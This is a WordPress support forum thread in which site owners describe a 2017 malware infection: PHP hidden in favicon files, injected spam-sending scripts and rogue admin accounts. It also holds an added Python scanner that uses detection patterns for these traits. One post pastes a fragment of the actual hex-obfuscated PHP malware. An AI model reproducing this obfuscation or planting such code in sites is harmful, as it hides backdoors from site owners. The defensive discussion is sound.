Title: malicious code inject
Last modified: October 9, 2017

---

# malicious code inject

 *  [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/)
 * I have the latest WP version and just had a malicious code injection.
 * I wonder, how can that happen, and what can be done for future protection?
 * On 2 domains some directories had been tampered with and had a brand new change
   date.
 * They were on one domain:
    wp-content/themes/twentysixteen
    wp-content/themes/twentysixteen/template-parts
 * The twentysixteen theme was installed, but another theme was active. It was updated
   to the latest version though (WP updates themes no matter whether they are active
   or not).
 * The other domain:
    wp-includes/rest-api
    wp-content/plugins/wp-members/admin
 * wp-members is a popular plugin that gets updated often?
 * So how to prevent such malicious code injections? Or if they happen, how to notice
   them?

Viewing 14 replies - 1 through 14 (of 14 total)

 *  [wosley24](https://wordpress.org/support/users/wosley24/)
 * (@wosley24)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9568424)
 * During the development stage, did you discourage search engines?
    When you were
   done developing the site, did you install a security plugin?
 * Did you delete all the unused plugins?
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9568478)
 * I installed WP from a docker (shared hosting). I have no security plugin though,
   I just saw that there are such plugins.
 *  [bsolutionsk](https://wordpress.org/support/users/bsolutionsk/)
 * (@bsolutionsk)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9571387)
 * Is the website hacked or has a code? What's the website address?
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9573107)
 * Some more details. 2 Sites got hacked. Both were 4.8.2 with all updates. One 
   was just about 1 week old.
 * They put a file called ssegtj.zip in the root directory.
 * In it are
 * /goren/ > 14 files
    /hopeir/ > 15 files
    .htaccess
    otiarw.php
    vrairue.php
 * I wonder how they managed to get that on the site?
 * In the meantime I installed the sucuri plugin and I hope that can help a little.
   Can’t it?
 *  [Adam](https://wordpress.org/support/users/adamlachut/)
 * (@adamlachut)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9573143)
 * Sucuri in the free version and other security plugins (like Wordfence) in free versions
   probably won’t help too much.
 * You need to assume that it’s a compromised hosting account, not a single domain or
   directory, so IMHO you need to start with blocking access to this hosting
   account, change all credentials and clean it file by file. If you have more WP
   (or other CMSes) installed, you need to at least update all of them.
 * Adam
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9586065)
 * Correct, Sucuri didn’t do anything. I got another malicious code injection.
 * They install code and send SPAM from the infected domain.
 * Any hints how to prevent that are appreciated.
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9586213)
 * I found favicon****.ico files that contained PHP code, that certainly can’t be
   right, or?
 * Also found 2 scripts the SPAM delivery identified as ‘sender’:
 * /public_html/domain01.coms/wp-content/advanced-cache.php
 * /public_html/domain01.org/wp-admin/js/widgets/xackoaqb.php
 * xackoaqb.php was a very new file, but advanced-cache.php was a few months old.
 * What is best now? Completely delete and reinstall the domains?
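
A sweep for the symptoms reported so far in this thread (PHP inside `.ico` files, a `.php` file under `wp-admin/js/`, hex-escaped or base64-wrapped PHP), as an added example that is not part of any post above. The heuristics, reason labels and the constructed sample tree in `demo()` are assumptions for illustration:

```python
import os
import re
import tempfile

# Heuristics are assumptions drawn from the symptoms reported in this thread.
PHP_TAG = re.compile(rb"<\?php", re.I)
HEX_RUN = re.compile(rb"(?:\\x[0-9a-fA-F]{1,2}){8,}")   # "\x47\x4c..." style strings
B64_EVAL = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
STATIC_EXT = {".ico", ".png", ".jpg", ".gif", ".css"}

def scan(root):
    """Return sorted (relative_path, reason) pairs for suspicious files under root."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)        # the first 1 MiB is enough for these checks
            if ext in STATIC_EXT and PHP_TAG.search(data):
                findings.append((rel, "php-in-static-file"))
            if ext == ".php":
                if rel.startswith("wp-admin/js/"):   # script directory, no PHP expected
                    findings.append((rel, "php-in-script-dir"))
                if HEX_RUN.search(data):
                    findings.append((rel, "hex-escaped-string"))
                if B64_EVAL.search(data):
                    findings.append((rel, "eval-base64"))
    return sorted(findings)

def demo():
    """Build a small constructed tree (not real site files) and scan it."""
    files = {
        "favicon_x1.ico": b"<?php /* constructed */ ?>",
        "favicon.ico": b"\x00\x00\x01\x00",
        "wp-admin/js/widgets/sample.php": b'<?php $t = "' + rb"\x63\x68\x72" * 3 + b'";',
        "wp-includes/version.php": b"<?php $wp_version = '4.8.2';",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(body)
        return scan(root)
```

Run `scan()` against a copy of the document root; a hit is a lead to inspect by hand, not proof of infection.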
 *  [ehutorny](https://wordpress.org/support/users/ehutorny/)
 * (@ehutorny)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9588336)
 * Today I noticed many links in search results with otiarw.php in URLs and it seems
   that all of them redirect to malicious sites. I’ve searched Google for otiarw.php
   and there are 2,890,000 results. Root URLs of sites that I’ve randomly checked
   either work OK or fail with a PHP error. All that I’ve checked have a wp-admin
   page.
 *  [B1000](https://wordpress.org/support/users/cvoicu/)
 * (@cvoicu)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9592030)
 * Similar issue here (spam, malicious files and malicious code in themes header).
   WordPress was updated to the latest stable version but I can’t tell for sure
   that the issue started after the update or prior to it, because some domains
   have older malicious files than the update, while on other domains the malicious
   files are newer than the update.
   For the moment we were not able to determine
   where the vulnerability is coming from but the code is doing a lot of things
   so I guess that completely deleting and reinstalling is a good start.
 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9592040)
 * side note to [@cvoicu](https://wordpress.org/support/users/cvoicu/),
 * If the troubleshooting already discussed made no difference for you, then, as
   per the [Forum Welcome](https://make.wordpress.org/support/handbook/forum-welcome/),
   please [post your own topic](http://wordpress.org/support/forum/how-to-and-troubleshooting#postform).
 *  [B1000](https://wordpress.org/support/users/cvoicu/)
 * (@cvoicu)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9592072)
 * [@t-p](https://wordpress.org/support/users/t-p/) I don’t think there’s need to
   post my own topic as I’ve basically replied to yellofish’s question about what
   should he do next. Thanks!
 *  Thread Starter [yellofish](https://wordpress.org/support/users/yellofish/)
 * (@yellofish)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9593448)
 * I deleted quite a lot of PHP files with base64 script in them. I can see plenty
   of hits looking for exactly those files from various IPs. I also installed Wordfence
   and did a scan (it needed .htaccess modification due to LiteSpeed). I guess I
   am pretty OK for now.
 * Another thing I did is renaming the /wp-content/ folder to something else. That
   will irritate the bots that look for certain plugins for a while (I hope).
 * Below is just some idea of what one of those (non base64) looks like:
 *     ```
       <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['le87e270'] = "\x7d\x4a\x7a\x30\x41\x50\x52\x68\x4e\x66\x27\x44\x35\xd\x2b\x34\x4c\x67\x3f\x3a\x5e\x7b\x40\x5f\x39\x28\x48\x69\x4f\x5a\x3b\x76\x37\x2c\x24\x6c\x56\x29\x74\x58\x6a\x64\x4d\x4b\x75\x73\x3c\x36\x7e\x20\x49\x7c\x2e\x25\x2f\x63\x59\x38\x5d\x60\x46\x22\x2a\x45\x31\x78\x77\x5b\x72\x5c\x55\x32\x9\xa\x33\x3d\x65\x2d\x79\x54\x43\x6e\x23\x47\x6b\x42\x6d\x21\x61\x70\x53\x6f\x3e\x57\x51\x71\x62\x26";
       $GLOBALS[$GLOBALS['le87e270'][86].$GLOBALS['le87e270'][47].$GLOBALS['le87e270'][76].$GLOBALS['le87e270'][15].$GLOBALS['le87e270'][3].$GLOBALS['le87e270'][15]] = $GLOBALS['le87e270'][55].$GLOBALS['le87e270'][7].$GLOBALS['le87e270'][68];
       ```
   
 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9595282)
 * If you believe your site is hacked, carefully follow [this guide](https://codex.wordpress.org/FAQ_My_site_was_hacked).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://codex.wordpress.org/Hardening_WordPress).
 *  [mllbrnk](https://wordpress.org/support/users/mllbrnk/)
 * (@mllbrnk)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9601523)
 * Just came across similar issues. Found two users in the database with admin rights
   (one from three years ago) that weren’t supposed to be there.


The topic ‘malicious code inject’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 14 replies
 * 8 participants
 * Last reply from: [mllbrnk](https://wordpress.org/support/users/mllbrnk/)
 * Last activity: [8 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-inject/#post-9601523)
 * Status: not resolved

